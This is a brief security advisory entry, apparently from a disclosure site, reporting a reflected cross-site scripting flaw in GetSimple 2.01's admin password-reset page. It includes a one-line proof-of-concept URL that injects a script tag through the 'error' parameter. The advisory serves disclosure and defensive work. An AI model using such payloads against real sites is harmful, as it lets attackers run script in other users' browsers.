Search
Software Vulnerability Tested On Date
GetSimple 2.01 Reflected Cross-site Scripting Windows Vista + XAMPP 7/6/2010
Description
A vulnerability in GetSimple 2.01 can be exploited to execute arbitrary JavaScript.
Proof of Concept
http://localhost/getsimple_2.01/admin/resetpassword.php?error=%3Cscript%3Ealert(0)%3C/script%3E